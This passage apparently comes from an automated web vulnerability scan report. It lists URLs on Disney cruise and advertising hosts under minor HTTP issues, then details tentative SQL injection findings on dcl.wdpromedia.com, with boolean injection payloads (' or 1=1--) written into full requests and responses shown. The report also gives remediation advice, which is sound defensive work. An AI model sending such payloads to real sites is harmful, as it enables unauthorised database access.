27.33. http://i.usatoday.net/asp/usatly/handler.ashx

27.34. http://images.scanalert.com/meter/www.mcafee.com/55.gif

27.35. http://imawow.weather.com/web/common/wxicons/36/26.gif

27.36. http://l.addthiscdn.com/live/t00/250lo.gif

27.37. http://login.dotomi.com/ucm/UCMController

27.38. http://metrics.fingerhut.com/b/ss/fingerhutcomprod/1/H.21/s03779584402218

27.39. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s06847484195604

27.40. http://metrics.sonystyle.com/b/ss/sonysonystyle2007prod/1/H.19.4/s95522347362719

27.41. http://metrics.us.playstation.com/b/ss/sceablogsprod/1/H.20.3/s87736232713796

27.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

27.43. http://nexus2.ensighten.com/sony/serverComponent.php

27.44. http://odb.outbrain.com/utils/ping.html

27.45. http://pagead2.googlesyndication.com/pagead/imgad

27.46. http://pastebin.com/trends

27.47. http://pixel.invitemedia.com/pubmatic_sync

27.48. http://pubads.g.doubleclick.net/gampad/ads

27.49. http://r.turn.com/r/beacon

27.50. http://rs.instantservice.com/resources/smartbutton/7470/II3_Servers.js

27.51. http://s7.addthis.com/js/250/addthis_widget.js

27.52. http://secureshopping.mcafee.com/

27.53. http://serv.adspeed.com/ad.php

27.54. http://sony.links.channelintelligence.com/pages/prices.asp

27.55. http://sony.links.origin.channelintelligence.com/pages/wl.asp

27.56. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax

27.57. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard

27.58. http://static.ak.fbcdn.net/connect/xd_proxy.php

27.59. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css

27.60. http://sync.mathtag.com/sync/img

27.61. http://t.invitemedia.com/track_imp

27.62. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros

27.63. http://tag.contextweb.com/TagPublish/getjs.aspx

27.64. http://travel.travelocity.com/favicon.ico

27.65. http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

27.66. http://ts.istrack.com/trackingAPI.js

27.67. http://turn.nexac.com/r/pu

27.68. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s02545102506410

27.69. http://w88.go.com/b/ss/wdgwdprodcl,wdgwdprosec,wdgdsec/1/H.22.1/s07427038340829

27.70. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico

27.71. http://wow.weather.com/weather/wow/module/USNY0400

27.72. http://www.bhphotovideo.com/bnh/controller/home

27.73. http://www.cruisecritic.com/reviews/cruiseline.cfm

27.74. http://www.facebook.com/plugins/like.php

27.75. http://www.google-analytics.com/__utm.gif

27.76. http://www.googleadservices.com/pagead/conversion/1034849195/

27.77. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp

27.78. https://www.mcafeesecure.com/RatingVerify

27.79. http://www.mickeypath.com/id/1304751739.jpg

27.80. http://www.orbitz.com/favicon.ico

27.81. http://www.passporter.com/concierge/ticker/countdown17548-1026.png

27.82. http://www.passporterboards.com/forums/clientscript/vbulletin_important.css

27.83. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

27.84. http://www.siteadvisor.com/download/windows.html

27.85. http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html

27.86. http://www.viddler.com/file/7d63c65a/html5mobile/

28. Cacheable HTTPS response

28.1. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico

28.2. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp

28.3. https://www.fingerhut.com/js/financial-snapshot.jsp

28.4. https://www.fingerhut.com/js/persistent_cart.jsp

28.5. https://www.fingerhut.com/js/sifr.jsp

28.6. https://www.fingerhut.com/user/login.jsp

28.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

29. HTML does not specify charset

29.1. http://a.tribalfusion.com/p.media/a3mOnI36QY5s7eUsBlWGMhRPnNTtMSWrb13rIoWEjpTaFaPaYFRVjZaQUaoRt7bUGjU4UmxmHyMXamx4dMFPGjZd5AULmW6yVHjhYUf9XFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r3aUHfSmmMCpVMtmHfolxCrdP/2020316/frame.html

29.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28

29.3. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233

29.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

29.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45

29.6. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

29.7. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

29.8. http://ad.doubleclick.net/adi/x1.dt/dt

29.9. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

29.10. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

29.11. http://cdn5.tribalfusion.com/media/1956006/frame.html

29.12. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

29.13. http://content.usatoday.com/asp/usataj/usatajhost.htm

29.14. http://d.xp1.ru4.com/um

29.15. http://ds.addthis.com/red/psi/sites/travel.usatoday.com/p.json

29.16. http://f.nexac.com/e/a-677/s-2140.xgi

29.17. http://fls.doubleclick.net/activityi

29.18. http://https.edge.ru4.com/smartserve/ad

29.19. http://odb.outbrain.com/utils/ping.html

29.20. http://ping.chartbeat.net/ping

29.21. http://pixel.invitemedia.com/data_sync

29.22. http://serv.adspeed.com/ad.php

29.23. http://wow.weather.com/weather/wow/module/USNY0400

29.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

30. Content type incorrectly stated

30.1. http://6e8d64.r.axf8.net/mr/a.gif

30.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221

30.3. http://blog.us.playstation.com/wp-content/themes/twenty11/images/ps_bg_support_gif.gif

30.4. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

30.5. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

30.6. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

30.7. http://eval.bizrate.com/js/survey_126457_1.js

30.8. http://feeds.delicious.com/v2/json/urlinfo/data

30.9. http://fingerhut-www.baynote.net/baynote/tags3/common

30.10. http://gs.instantservice.com/geoipAPI.js

30.11. http://https.edge.ru4.com/smartserve/ad

30.12. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx

30.13. http://ots.optimize.webtrends.com/ots/ots/js-3.

30.14. http://ots.optimize.webtrends.com/ots/ots/js-3.

30.15. http://secureshopping.mcafee.com/images/favicon.ico

30.16. http://shop.pacsun.com/js/widget-qv-uc.jsp

30.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

30.18. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax

30.19. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard

30.20. http://sr2.liveperson.net/hcp/html/mTag.js

30.21. http://ts.istrack.com/trackingAPI.js

30.22. http://us.playstation.com/uwps/CookieHandler

30.23. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico

30.24. http://wow.weather.com/weather/wow/module/USNY0400

30.25. http://www.facebook.com/extern/login_status.php

30.26. http://www.fingerhut.com/assets/f/misc/bkgicon.jpg

30.27. http://www.fingerhut.com/fingerhut/assets/images/favicon.ico

30.28. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp

30.29. http://www.fingerhut.com/js/financial-snapshot.jsp

30.30. http://www.fingerhut.com/js/persistent_cart.jsp

30.31. http://www.fingerhut.com/js/sifr.jsp

30.32. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico

30.33. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp

30.34. https://www.fingerhut.com/js/financial-snapshot.jsp

30.35. https://www.fingerhut.com/js/persistent_cart.jsp

30.36. https://www.fingerhut.com/js/sifr.jsp

30.37. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif

30.38. http://www.passporterboards.com/forums/customavatars/avatar15288_4.gif

30.39. http://www.passporterboards.com/forums/customavatars/avatar17690_3.gif

30.40. http://www.passporterboards.com/forums/customavatars/avatar18759_15.gif

30.41. http://www.passporterboards.com/forums/customavatars/avatar30289_3.gif

30.42. http://www.passporterboards.com/forums/customavatars/avatar3404_4.gif

30.43. http://www.passporterboards.com/forums/customavatars/avatar7184_7.gif

30.44. http://www.passporterboards.com/forums/signaturepics/sigpic1001_7.gif

30.45. http://www.passporterboards.com/forums/signaturepics/sigpic10872_14.gif

30.46. http://www.passporterboards.com/forums/signaturepics/sigpic17690_3.gif

30.47. http://www.passporterboards.com/forums/signaturepics/sigpic18031_10.gif

30.48. http://www.passporterboards.com/forums/signaturepics/sigpic18759_24.gif

30.49. http://www.passporterboards.com/forums/signaturepics/sigpic21228_3.gif

30.50. http://www.passporterboards.com/forums/signaturepics/sigpic3404_109.gif

30.51. http://www.passporterboards.com/forums/signaturepics/sigpic7184_20.gif

30.52. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

30.53. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

31. Content type is not specified

31.1. http://ads.bluelithium.com/st

31.2. http://localhost:50386/favicon.ico

31.3. http://localhost:50386/hoyt.net

31.4. http://localhost:50386/hoyt.net/sitefinity

31.5. http://pcm1.map.pulsemgr.com/uds/pc

31.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard

31.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay



1. SQL injection
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, malformed data supplied in the second step cannot interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights and to avoid vulnerabilities being introduced by changes elsewhere within the application's code base.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 38734480'%20or%201%3d1--%20 and 38734480'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media38734480'%20or%201%3d1--%20/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:11 GMT
Content-Length: 102641
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /media38734480'%20or%201%3d2--%20/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:11 GMT
Content-Length: 33396
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">


           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

1.2. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15929969'%20or%201%3d1--%20 and 15929969'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /concat15929969'%20or%201%3d1--%20/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:17 GMT
Content-Length: 102597
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       
<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

Request 2

GET /concat15929969'%20or%201%3d2--%20/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:17 GMT
Content-Length: 33352
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       

   

</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

1.3. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20163560'%20or%201%3d1--%20 and 20163560'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media20163560'%20or%201%3d1--%20/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:15 GMT
Content-Length: 102631
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       
<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

Request 2

GET /media20163560'%20or%201%3d2--%20/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:15 GMT
Content-Length: 33386
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       

   

</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
